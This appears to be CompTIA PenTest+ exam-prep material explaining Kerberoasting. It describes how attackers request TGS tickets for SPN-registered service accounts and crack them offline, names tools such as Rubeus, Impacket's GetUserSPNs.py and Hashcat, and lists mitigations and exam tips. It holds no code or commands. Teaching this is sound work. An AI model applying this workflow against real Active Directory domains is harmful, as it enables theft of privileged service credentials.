In the context of CompTIA PenTest+, Kerberoasting is a critical post-exploitation technique used to extract service account credentials from Microsoft Active Directory (AD). It exploits the architecture of the Kerberos authentication protocol, specifically targeting Service Principal Names (SPNs). …In the context of CompTIA PenTest+, Kerberoasting is a critical post-exploitation technique used to extract service account credentials from Microsoft Active Directory (AD). It exploits the architecture of the Kerberos authentication protocol, specifically targeting Service Principal Names (SPNs).
The attack mechanism works as follows: Any authenticated user within a domain, regardless of their privilege level, can request a Ticket Granting Service (TGS) ticket for any service that has an SPN registered. The vulnerability lies in how the Domain Controller delivers this ticket. A portion of the TGS ticket is encrypted using the NTLM hash of the service account's password. When an attacker requests the ticket using tools like Rubeus, Mimikatz, or Invoke-Kerberoast, the Domain Controller provides this encrypted blob without verifying if the user has permissions to actually access the service application itself.
Once the attacker captures the ticket, they take it offline. Because the encryption key is derived solely from the service account's password, the attacker can use brute-force tools like Hashcat or John the Ripper to attempt to crack the hash. If the service account has a weak password, the attacker can recover the plaintext credentials.
This is a high-value attack vector because service accounts often hold elevated privileges (such as Domain Admin) and their passwords are rarely changed to avoid breaking application dependencies. To mitigate Kerberoasting, administrators should enforce long, complex passwords (over 25 characters) for all service accounts, making offline brute-force attempts computationally infeasible, or utilize Group Managed Service Accounts (gMSAs).
Kerberoasting: Attacks and Exploits
What is Kerberoasting? Kerberoasting is a prevalent post-exploitation attack technique used within Microsoft Active Directory environments. It enables an attacker, who has valid credentials for any domain user (even an unprivileged one), to extract the password hashes of service accounts. This technique is distinct because it abuses the legitimate functionality of the Kerberos protocol rather than exploiting a software vulnerability.
Why is it Important? In the context of CompTIA PenTest+, Kerberoasting is crucial because it facilitates Privilege Escalation and Lateral Movement. Service accounts often possess elevated privileges (such as Domain Admin rights) and frequently use weak passwords that do not expire. Because the cracking process happens offline, it is difficult for defenders to detect without specific monitoring of Ticket Granting Service (TGS) requests.
How it Works The attack follows a specific workflow involving Service Principal Names (SPNs): 1. Enumeration: The attacker identifies accounts in the domain that have an SPN set. An SPN links a service instance to a domain login account. 2. Request: The attacker requests a Kerberos service ticket (TGS) for the targeted SPN using their authenticated session. 3. Extraction: The Domain Controller issues the ticket. Crucially, part of this ticket is encrypted using the NTLM hash of the service account's password. The attacker extracts this ticket from memory or the network. 4. Offline Cracking: The attacker takes the ticket offline and uses tools like Hashcat or John the Ripper to brute-force the encrypted segment. If the service account has a weak password, the tool reveals the plaintext credentials.
Exam Tips: Answering Questions on Kerberoasting To answer questions correctly on the exam, focus on these associations: 1. Keywords: If a scenario mentions Service Principal Names (SPN), requesting TGS tickets, offline cracking, or accessing service account credentials, the answer is Kerberoasting. 2. Tools: Recognize tools associated with this attack, specifically Rubeus, Impacket (GetUserSPNs.py), and Invoke-Kerberoast. 3. Differentiation: Do not confuse this with Golden Tickets or Silver Tickets. Golden/Silver tickets involve forging tickets to maintain persistence using a known hash. Kerberoasting involves stealing a hash to crack a password for access. 4. Mitigation: If asked for remediation, the correct answer is usually to ensure service accounts have complex, long passwords (greater than 25 characters) to make offline brute-forcing mathematically infeasible.